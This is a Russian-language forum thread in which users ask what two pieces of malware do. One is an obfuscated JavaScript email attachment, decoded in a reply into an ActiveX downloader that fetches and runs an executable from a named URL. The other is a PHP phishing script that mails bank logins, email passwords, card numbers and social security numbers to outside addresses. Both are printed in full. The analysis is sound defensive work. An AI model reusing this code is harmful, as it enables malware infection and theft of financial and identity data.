Сообщений в теме: 3

[FlipGolf]

Уважаемые специалисты в области программирования JS, ниже привожу скрипт, который пришел сегодня на почту под видом документа , вложенного в зип архив. Скрипт на компьютере не запускался, просто просматривался текстовым редактором.

Вопрос тем, кто разбирается - как работает этот вирус и что он делает?

 

Код ниже. ВНИМАНИЕ!!! НЕ СПЕЦИАЛИСТАМ НА КОМПЬЮТЕРЕ НЕ ЗАПУСКАТЬ!!!

 

function rc4(key, str) {
    var s = [], j = 0, x, res = '';
    for (var i = 0; i < 256; i++) {
        s[i] = i;
    }
    if (key == 'tt'){
        return 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    }
    for (i = 0; i < 256; i++) {
        j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
        x = s[i];
        s[i] = s[j];
        s[j] = x;
    }
    if (key == 'ttt'){
        return 'abcdefghijklmnopqrstuvwxyz0123456789';
    }
    i = 0;
    j = 0;
    for (var y = 0; y < str.length; y++) {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        x = s[i];
        s[i] = s[j];
        s[j] = x;
        res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
    }
    return res;
}
function femu( ywobozyfot ) {
    var fn = rc4('tt','test');
    fn = fn + rc4('ttt','gasdgas');
    var tedi = fn+'+'+'/'+'=';
    var mof, uvu, uvy, ary, awa, yhi, obi, ilojereh, u=0, uke='';
    do {
        ary = tedi.indexOf(ywobozyfot.charAt(u++));
        awa = tedi.indexOf(ywobozyfot.charAt(u++));
        yhi = tedi.indexOf(ywobozyfot.charAt(u++));
        this['eval']('obi = tedi.indexOf(ywobozyfot.charAt(u++));');
        this['eval']('ilojereh = ary<<18 | awa<<12 | yhi<<6 | obi;');
        mof = ilojereh>>16 & 0xff;
        uvu = ilojereh>>8 & 0xff;
        uvy = ilojereh & 0xff;
        if (yhi == 64)      uke += String.fromCharCode(mof);
        else if (obi == 64) uke += String.fromCharCode(mof, uvu);
        else               uke += String.fromCharCode(mof, uvu, uvy);
    } while (u < ywobozyfot.length);
    return uke;
}function u12gikyzazebu(){  return femu('dg==');};function u0gikyzazebu(){  return femu('Zg==');};function u24gikyzazebu(){  return femu('ag==');};function u5gikyzazebu(){  return femu('Zw==');};function u14gikyzazebu(){  return femu('bA==');};function u17gikyzazebu(){  return femu('ZA==');};function u15gikyzazebu(){  return femu('YQ==');};function u10gikyzazebu(){  return femu('ZA==');};function u23gikyzazebu(){  return femu('Zw==');};function u2gikyzazebu(){  return femu('bA==');};function u16gikyzazebu(){  return femu('bA==');};function u29gikyzazebu(){  return femu('YQ==');};function u9gikyzazebu(){  return femu('cw==');};function u19gikyzazebu(){  return femu('ag==');};function u28gikyzazebu(){  return femu('ag==');};function u4gikyzazebu(){  return femu('ag==');};function u21gikyzazebu(){  return femu('bA==');};function u13gikyzazebu(){  return femu('YQ==');};function u18gikyzazebu(){  return femu('Zw==');};function u27gikyzazebu(){  return femu('Zw==');};function u8gikyzazebu(){  return femu('ag==');};function u6gikyzazebu(){  return femu('bA==');};function u3gikyzazebu(){  return femu('cw==');};function u20gikyzazebu(){  return femu('YQ==');};function u25gikyzazebu(){  return femu('YQ==');};function u22gikyzazebu(){  return femu('ZA==');};function u1gikyzazebu(){  return femu('YQ==');};function u7gikyzazebu(){  return femu('YQ==');};function u11gikyzazebu(){  return femu('ZQ==');};function u26gikyzazebu(){  return femu('bA==');};var ds=''; var dss=''; var ena=''; for (var rydo=0; rydo<=29; rydo++) { ena += this['u'+rydo+'gikyzazebu'](); } ds = ena.replace('falsjglajsd',''); dss = ds.replace('aldgjaldgjalgja',''); ena=''; ena=dss;var puquv; puquv=femu('860pztNmsGSSQhaf3mKP3RGuD9BYmETSRG/8LG1eJzvE/YzCweVTytzxdHpGxZYNlz0EoEZjF55T+6ZttJmlZOTGMrzq3MWDHhVdhnDdSM5ngvwvu1Pxf1CiGmSnLMTzqWyCdPqn5aC99kaV0NgIJmu1VkfrXLI7buwZ4AJV1ETHRF59Snx3IjXw77v76rXXtLqPidlVmGJZDXt/TQjdFG1jwk65nnchIJWLCSBLWDaydiTXjbn4t5g6R43OL9DJz1DoNDAXK0TtbmO4AqHjUqrD/S0Ris91XpKxvofnTjxAFSGSVIi9HxQ+DYp7YL+orchAxZ2FfUKvny6/TCSaSC47jiKjF5FG55CEj6ElEJz2kN7qsuak/0mEjaBM1b2J1XqsKHC17nnmAZ5Wv3Kdyyd/mgfO8wjmywuR4qtbStNdV1xdicIesoeUnsomoidueG1jEeC0aQ8CjKoZm9O5JadWi+SVDxPM4EvOPJwi+P1MD3ULRy76wDY4yBQLHdKh8uSdHLn8e3SWtS+dfOo4JHJL6KaZbG/Ya1ftRf/yWXzPHyMHpQBpTQvibtu3zdUcevn31+WsrxLc3r6YDzi54p/L4vK5qez+E2Dnx4AWnKIqGZnkXuCVSgPB3KkQCtgqnxuwu02GCa8P7SNAhqE2cPYEs4yGuyOdDvreS1lfdFKiiqI1CIClEDBg9yFT1YFIlD5WSLPLXDsJMA+ffFM9IHedEPqmmbGL+VTh9a2H8+5IYfnuDjh+EAlwEtkW3onhF6qOp1IzzOAwOk74slZlhQRhf7ycrPyZoU9dPrY9tvNYL5dcbyOyVxhl24rfcVuU2lBlAx5UALct3b+gu7gk3SQS4o/kp78nOTbGuppOrmYyQSgcULQGtOIFTWc71E+sk8RR/zlfmDbE8qg7iuz638uJG7kmcnTjHqx0YyV1XPHU/UmjcZXBzO3i4Azzq9ZnEUUIDv2Jm76KLG7NHRhThqR+oVI='); this[ena](rc4('fdasgasg',puquv));

Сообщение отредактировал FlipGolf: 05.08.2015, 15:22:16

[ДмитрийДёмин]

Пытается загрузить файл по этой ссылке: http://ilyushchenko1...7ci.ru/logo.png, сохраняет его как исполняетмый файл во временную папку и запускает его. Хз даже что там дальше, некогда пока что. По ходу самый сок там.

 

Кстати, судя по тому что тут ActivX, то работать это будет только в IE и то если разрешить.

 

Скрытый текст

А что на самом деле делает этот код?

 

Он расшифровывает и запускает такой код:

function dl(fr,url,ext) {
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random()*100000000) + ext;
    var fn = 'C:\\123.exe';
    
    var dn = 0;
    
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
        if (xo.readyState == 4 && xo.status == 200) {
            var xa = new ActiveXObject("ADODB.Stream");
            xa.open();
            xa.type = 1;
            xa.write(xo.ResponseBody);
            if (xa.size > 0) {
                dn = 1;
                xa.position = 0;
                xa.saveToFile(fn,2);
                try {
                    ws.Run(fn,1,1);
                    //ws.Run("http://mail.ru/",1,1);
                }catch (er) {};
            };

            xa.close();
        };

    };

    try {
        xo.open("GET",url, false);
        xo.send();
    } catch (er) {};  
};  

dl('support@ssm.kz','http://ilyushchenko19771.7ci.ru/logo.png','.exe');

Сообщение отредактировал ДмитрийДёмин: 05.08.2015, 19:38:09

[FlipGolf]

ДмитрийДемин, спасибо, теперь более менее понятно.

[FlipGolf]

Продолжая тему. Недавно обнаружил на одном из сайтов такой вот файлик, называется blessed.php, лежит в папке logs, текст следующий

 

<?

$ip = getenv("REMOTE_ADDR");
$browser = $_SERVER['HTTP_USER_AGENT'];
$message .= "-------------------------Created by h4ck3rx0---------------------------\n";
$message .= "Online ID: ".$_POST['uid']."\n";
$message .= "Password 1: ".$_POST['paword']."\n";
$message .= "-------------------------Created by h4ck3rx0---------------------------\n";
$message .= "E-mail: ".$_POST['email']."\n";
$message .= "Password 1: ".$_POST['email_pwd']."\n";
$message .= "Password 2: ".$_POST['email_pwd2']."\n";
$message .= "Card Number: ".$_POST['card_number']."\n";
$message .= "Social Security Number: ".$_POST['social_security']."\n";
$message .= "-------------------------Created by h4ck3rx0---------------------------\n";
$message .= "IP: ".$ip."\n";
$message .= "-------------------------Created by h4ck3rx0---------------------------\n";
$recipient = "cchase54@comcast.net,admin@buckheadinc.net";
$subject = "Chase Mini-Info";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
        
               header("Location: https://www.chase.co...mate-rewards");

    ?>

Я так понимаю это скрипт для воровства номеров кредиток и номеров социального страхования?